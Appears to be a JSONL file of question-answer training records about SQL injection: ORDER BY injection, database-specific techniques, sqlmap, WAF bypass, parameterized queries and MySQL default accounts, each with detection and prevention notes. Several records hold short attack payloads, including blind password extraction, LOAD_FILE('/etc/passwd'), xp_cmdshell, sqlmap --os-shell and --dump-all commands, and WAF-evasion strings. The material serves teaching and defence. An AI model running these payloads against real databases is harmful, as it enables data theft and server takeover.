+{"id": "trtp-3023ac22f25e", "instruction": "What threats are associated with SQL Injection in ORDER BY/GROUP BY?", "output": "Attack techniques involving SQL Injection in ORDER BY/GROUP BY:\n\n- Column count enumeration via ORDER BY\n- CASE-based conditional extraction\n- Error-based extraction through invalid column\n- Schema discovery via column names\n\nDefenders can detect these attacks by:\n- Non-column values in ORDER BY\n- CASE/IF statements in sorting\n- Numeric ORDER BY probing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108950Z", "updated_at": "2025-12-17T19:35:42.108950Z"}
+{"id": "trtp-dd8a318d674e", "instruction": "What indicators reveal malicious activity involving SQL Injection in ORDER BY/GROUP BY?", "output": "Methods for detecting SQL Injection in ORDER BY/GROUP BY attacks or anomalies:\n\n- Non-column values in ORDER BY\n- CASE/IF statements in sorting\n- Numeric ORDER BY probing\n- Subqueries in ORDER BY/GROUP BY", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108961Z", "updated_at": "2025-12-17T19:35:42.108961Z"}
+{"id": "trtp-88e147326b47", "instruction": "How can organizations protect against SQL Injection in ORDER BY/GROUP BY?", "output": "Security controls and preventive measures for SQL Injection in ORDER BY/GROUP BY:\n\n- Allowlist valid column names for sorting\n- Map user input to predefined sort options\n- Avoid dynamic ORDER BY construction\n- Validate sort direction (ASC/DESC only)\n\nORDER BY injection is often overlooked because developers assume sorting is safe. Since parameterization doesn't work here, allowlisting column names is required. Conditional CASE statements enable blind extraction.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108988Z", "updated_at": "2025-12-17T19:35:42.108988Z"}
+{"id": "trtp-6914e4fbe41c", "instruction": "Show an example of SQL Injection in ORDER BY/GROUP BY.", "output": "Example of SQL Injection in ORDER BY/GROUP BY:\n\n```sql\n-- Column enumeration: ORDER BY 1, ORDER BY 2, etc.\n-- Conditional extraction: ORDER BY (CASE WHEN (SELECT SUBSTRING(password,1,1)='a' FROM users LIMIT 1) THEN 1 ELSE 2 END)\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.109000Z", "updated_at": "2025-12-17T19:35:42.109000Z"}
+{"id": "trtp-9a163578518f", "instruction": "What is Database-Specific SQL Injection and why is it important for database security?", "output": "Each database has unique syntax, functions, and features that affect injection techniques. MySQL, MSSQL, PostgreSQL, and Oracle have different comment styles, string functions, and dangerous capabilities.\n\nSecurity Relevance: Database-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. Generic payloads often fail.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111244Z", "updated_at": "2025-12-17T19:35:42.111244Z"}
+{"id": "trtp-02429b443fd5", "instruction": "What are the main parts of Database-Specific SQL Injection that security teams should understand?", "output": "Database-Specific SQL Injection consists of the following key components:\n\n- Comment syntax variations\n- String concatenation differences\n- System function differences\n- Dangerous built-in procedures\n- Information schema variations", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111265Z", "updated_at": "2025-12-17T19:35:42.111265Z"}
+{"id": "trtp-62cfdae3c47c", "instruction": "How can Database-Specific SQL Injection lead to database security incidents?", "output": "Database-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. Generic payloads often fail.\n\nCommon attack vectors include:\n- MySQL: LOAD_FILE('/etc/passwd')\n- MSSQL: EXEC xp_cmdshell 'command'\n- Oracle: SELECT * FROM v$version\n- PostgreSQL: COPY (SELECT *) TO '/tmp/out'", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111280Z", "updated_at": "2025-12-17T19:35:42.111280Z"}
+{"id": "trtp-dde369f6907f", "instruction": "What threats are associated with Database-Specific SQL Injection?", "output": "Attack techniques involving Database-Specific SQL Injection:\n\n- MySQL: LOAD_FILE('/etc/passwd')\n- MSSQL: EXEC xp_cmdshell 'command'\n- Oracle: SELECT * FROM v$version\n- PostgreSQL: COPY (SELECT *) TO '/tmp/out'\n\nDefenders can detect these attacks by:\n- Database-specific function patterns\n- Comment style analysis\n- System table access patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111294Z", "updated_at": "2025-12-17T19:35:42.111294Z"}
+{"id": "trtp-78e108ec3c61", "instruction": "How can security teams detect attacks related to Database-Specific SQL Injection?", "output": "Methods for detecting Database-Specific SQL Injection attacks or anomalies:\n\n- Database-specific function patterns\n- Comment style analysis\n- System table access patterns\n- Fingerprinting query attempts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111317Z", "updated_at": "2025-12-17T19:35:42.111317Z"}
+{"id": "trtp-9c945f5afb6a", "instruction": "What preventive measures address Database-Specific SQL Injection vulnerabilities?", "output": "Security controls and preventive measures for Database-Specific SQL Injection:\n\n- Disable dangerous database features\n- Database-specific hardening guides\n- WAF with database-specific rules\n- Function/procedure access restrictions\n\nDatabase-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. Generic payloads often fail.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111329Z", "updated_at": "2025-12-17T19:35:42.111329Z"}
+{"id": "trtp-4ec7faf55d1a", "instruction": "Show an example of Database-Specific SQL Injection.", "output": "Example of Database-Specific SQL Injection:\n\n```sql\n-- MySQL comment: #, -- , /**/\n-- MSSQL comment: --, /**/\n-- MySQL concat: CONCAT(a,b)\n-- MSSQL concat: a+b\n-- Oracle concat: a||b\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111339Z", "updated_at": "2025-12-17T19:35:42.111339Z"}
+{"id": "trtp-a3a64bf18fb5", "instruction": "How does SQL Injection Automation with sqlmap work and what are its security implications?", "output": "sqlmap is the premier SQL injection automation tool. It detects injection points, fingerprints databases, extracts data, and can achieve OS shell access. Understanding sqlmap helps both attackers and defenders.\n\nSecurity Relevance: sqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. Defending against sqlmap patterns is essential.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113399Z", "updated_at": "2025-12-17T19:35:42.113399Z"}
+{"id": "trtp-b07bf12bfcbf", "instruction": "What are the main parts of SQL Injection Automation with sqlmap that security teams should understand?", "output": "SQL Injection Automation with sqlmap consists of the following key components:\n\n- Injection point detection\n- Database fingerprinting\n- Data extraction automation\n- Privilege escalation features\n- OS shell capabilities", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113418Z", "updated_at": "2025-12-17T19:35:42.113418Z"}
+{"id": "trtp-3b2202043142", "instruction": "Why is SQL Injection Automation with sqlmap important for database security?", "output": "sqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. Defending against sqlmap patterns is essential.\n\nCommon attack vectors include:\n- Database enumeration: --dbs\n- Table dumping: --tables -D database\n- Data extraction: --dump -T users\n- OS shell: --os-shell", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113433Z", "updated_at": "2025-12-17T19:35:42.113433Z"}
+{"id": "trtp-5588901ccf22", "instruction": "How do attackers abuse SQL Injection Automation with sqlmap?", "output": "Attack techniques involving SQL Injection Automation with sqlmap:\n\n- Database enumeration: --dbs\n- Table dumping: --tables -D database\n- Data extraction: --dump -T users\n- OS shell: --os-shell\n\nDefenders can detect these attacks by:\n- sqlmap User-Agent string\n- Systematic parameter fuzzing\n- Rapid sequential injection attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113448Z", "updated_at": "2025-12-17T19:35:42.113448Z"}
+{"id": "trtp-7242020b1fef", "instruction": "How do you detect exploitation of SQL Injection Automation with sqlmap?", "output": "Methods for detecting SQL Injection Automation with sqlmap attacks or anomalies:\n\n- sqlmap User-Agent string\n- Systematic parameter fuzzing\n- Rapid sequential injection attempts\n- Known sqlmap payload patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113460Z", "updated_at": "2025-12-17T19:35:42.113460Z"}
+{"id": "trtp-7e13fffa83d9", "instruction": "What security controls mitigate SQL Injection Automation with sqlmap risks?", "output": "Security controls and preventive measures for SQL Injection Automation with sqlmap:\n\n- Rate limiting slows automation\n- Behavioral analysis for automated patterns\n- CAPTCHA on sensitive forms\n- Honeypot parameters\n\nsqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. Defending against sqlmap patterns is essential.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113492Z", "updated_at": "2025-12-17T19:35:42.113492Z"}
+{"id": "trtp-3474483ad899", "instruction": "Show an example of SQL Injection Automation with sqlmap.", "output": "Example of SQL Injection Automation with sqlmap:\n\n```sql\n# Basic injection test:\nsqlmap -u 'http://site.com/page?id=1' --dbs\n\n# Full exploitation:\nsqlmap -u URL --dump-all\nsqlmap -u URL --os-shell\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113505Z", "updated_at": "2025-12-17T19:35:42.113505Z"}
+{"id": "trtp-fbcbecce67ce", "instruction": "Explain WAF Bypass for SQL Injection from a security perspective.", "output": "Web Application Firewalls attempt to block SQL injection but can be bypassed through encoding, alternative syntax, and filter evasion. Understanding bypass techniques helps both penetration testers and WAF administrators.\n\nSecurity Relevance: WAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115779Z", "updated_at": "2025-12-17T19:35:42.115779Z"}
+{"id": "trtp-6155aa926f75", "instruction": "What elements make up WAF Bypass for SQL Injection?", "output": "WAF Bypass for SQL Injection consists of the following key components:\n\n- URL encoding variations\n- Comment-based bypasses\n- Whitespace alternatives\n- Case manipulation\n- Function alternatives", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115799Z", "updated_at": "2025-12-17T19:35:42.115799Z"}
+{"id": "trtp-53d6bf028a90", "instruction": "From a security perspective, why should defenders understand WAF Bypass for SQL Injection?", "output": "WAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.\n\nCommon attack vectors include:\n- Comment insertion: UN/**/ION SEL/**/ECT\n- Double URL encoding: %252F for /\n- Case variation: sElEcT\n- Alternative whitespace: %09, %0a, %0d", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115814Z", "updated_at": "2025-12-17T19:35:42.115814Z"}
+{"id": "trtp-4b133f6ef683", "instruction": "What attacks exploit WAF Bypass for SQL Injection?", "output": "Attack techniques involving WAF Bypass for SQL Injection:\n\n- Comment insertion: UN/**/ION SEL/**/ECT\n- Double URL encoding: %252F for /\n- Case variation: sElEcT\n- Alternative whitespace: %09, %0a, %0d\n\nDefenders can detect these attacks by:\n- Multiple encoding detection\n- Normalized input analysis\n- Comment pattern detection", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115828Z", "updated_at": "2025-12-17T19:35:42.115828Z"}
+{"id": "trtp-1940eae9e0b1", "instruction": "What should analysts look for when monitoring for WAF Bypass for SQL Injection?", "output": "Methods for detecting WAF Bypass for SQL Injection attacks or anomalies:\n\n- Multiple encoding detection\n- Normalized input analysis\n- Comment pattern detection\n- Non-standard whitespace", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115856Z", "updated_at": "2025-12-17T19:35:42.115856Z"}
+{"id": "trtp-2c6a16fc004e", "instruction": "What preventive measures address WAF Bypass for SQL Injection vulnerabilities?", "output": "Security controls and preventive measures for WAF Bypass for SQL Injection:\n\n- Recursive decoding before analysis\n- Normalize case before matching\n- Block all comment sequences\n- Parameterized queries as primary defense\n\nWAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115868Z", "updated_at": "2025-12-17T19:35:42.115868Z"}
+{"id": "trtp-6942c962321d", "instruction": "What does WAF Bypass for SQL Injection look like in SQL?", "output": "Example of WAF Bypass for SQL Injection:\n\n```sql\n-- Comment insertion: SEL/**/ECT * FROM users\n-- Case variation: sElEcT * fRoM users\n-- Encoding: %53%45%4C%45%43%54\n-- Whitespace: SELECT%09*%09FROM%09users\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115898Z", "updated_at": "2025-12-17T19:35:42.115898Z"}
+{"id": "trtp-d270c65b527f", "instruction": "What is Parameterized Queries and Prepared Statements and why is it important for database security?", "output": "Parameterized queries (prepared statements) are the primary defense against SQL injection. They separate SQL code from data, ensuring user input is always treated as data, never as executable code.\n\nSecurity Relevance: Parameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. No amount of malicious input can alter query logic when properly parameterized.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118067Z", "updated_at": "2025-12-17T19:35:42.118067Z"}
+{"id": "trtp-5c07420e5e9f", "instruction": "Describe the technical aspects of Parameterized Queries and Prepared Statements.", "output": "Parameterized Queries and Prepared Statements consists of the following key components:\n\n- Query preparation phase\n- Parameter binding\n- Type enforcement\n- Query plan caching\n- ORM parameterization", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118089Z", "updated_at": "2025-12-17T19:35:42.118089Z"}
+{"id": "trtp-279a6ca908be", "instruction": "From a security perspective, why should defenders understand Parameterized Queries and Prepared Statements?", "output": "Parameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. No amount of malicious input can alter query logic when properly parameterized.\n\nCommon attack vectors include:\n- Second-order injection (if output used unsafely)\n- Dynamic SQL within stored procedures\n- ORDER BY (can't parameterize columns)\n- Table/column name injection", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118103Z", "updated_at": "2025-12-17T19:35:42.118103Z"}
+{"id": "trtp-591e83d371a1", "instruction": "What attacks exploit Parameterized Queries and Prepared Statements?", "output": "Attack techniques involving Parameterized Queries and Prepared Statements:\n\n- Second-order injection (if output used unsafely)\n- Dynamic SQL within stored procedures\n- ORDER BY (can't parameterize columns)\n- Table/column name injection\n\nDefenders can detect these attacks by:\n- Code review for string concatenation\n- Static analysis for unsafe query patterns\n- ORM configuration verification", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118117Z", "updated_at": "2025-12-17T19:35:42.118117Z"}
+{"id": "trtp-3914eb4ff4d1", "instruction": "What log entries indicate Parameterized Queries and Prepared Statements attacks?", "output": "Methods for detecting Parameterized Queries and Prepared Statements attacks or anomalies:\n\n- Code review for string concatenation\n- Static analysis for unsafe query patterns\n- ORM configuration verification\n- Dynamic SQL in stored procedures", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118129Z", "updated_at": "2025-12-17T19:35:42.118129Z"}
+{"id": "trtp-469e95a88e4e", "instruction": "What security controls mitigate Parameterized Queries and Prepared Statements risks?", "output": "Security controls and preventive measures for Parameterized Queries and Prepared Statements:\n\n- Use parameterized queries for all user input\n- ORM frameworks with proper configuration\n- Allowlist validation for dynamic identifiers\n- Code review for parameterization completeness\n\nParameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. No amount of malicious input can alter query logic when properly parameterized.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118141Z", "updated_at": "2025-12-17T19:35:42.118141Z"}
+{"id": "trtp-16ab4a28c53b", "instruction": "Provide a code example for Parameterized Queries and Prepared Statements.", "output": "Example of Parameterized Queries and Prepared Statements:\n\n```sql\n-- Vulnerable: cursor.execute(f\"SELECT * FROM users WHERE id = {user_id}\")\n-- Safe: cursor.execute(\"SELECT * FROM users WHERE id = %s\", (user_id,))\n\n-- Java PreparedStatement:\nPreparedStatement stmt = conn.prepareStatement(\"SELECT * FROM users WHERE id = ?\");\nstmt.setInt(1, userId);\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118152Z", "updated_at": "2025-12-17T19:35:42.118152Z"}
+{"id": "trtp-0f0637bf6578", "instruction": "Explain MySQL Default Accounts and Authentication from a security perspective.", "output": "MySQL installations include default accounts that are frequently misconfigured. The root account, anonymous users, and test databases present immediate security risks if not properly secured during installation.\n\nSecurity Relevance: Default MySQL configurations are insecure. Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. mysql_secure_installation addresses common issues but is often skipped.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120279Z", "updated_at": "2025-12-17T19:35:42.120279Z"}
+{"id": "trtp-b94f3495a2d8", "instruction": "What elements make up MySQL Default Accounts and Authentication?", "output": "MySQL Default Accounts and Authentication consists of the following key components:\n\n- root account without password\n- Anonymous user accounts\n- Remote root access\n- mysql.user table\n- Authentication plugins", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120309Z", "updated_at": "2025-12-17T19:35:42.120309Z"}
+{"id": "trtp-942db21a558c", "instruction": "From a security perspective, why should defenders understand MySQL Default Accounts and Authentication?", "output": "Default MySQL configurations are insecure. Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. mysql_secure_installation addresses common issues but is often skipped.\n\nCommon attack vectors include:\n- Connect as root without password\n- Anonymous user access\n- Remote root login attempts\n- mysql.user table enumeration", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120323Z", "updated_at": "2025-12-17T19:35:42.120323Z"}
+{"id": "trtp-475b2e506675", "instruction": "How do attackers abuse MySQL Default Accounts and Authentication?", "output": "Attack techniques involving MySQL Default Accounts and Authentication:\n\n- Connect as root without password\n- Anonymous user access\n- Remote root login attempts\n- mysql.user table enumeration\n\nDefenders can detect these attacks by:\n- Failed authentication attempts\n- Anonymous user connections\n- Remote root connection attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120352Z", "updated_at": "2025-12-17T19:35:42.120352Z"}
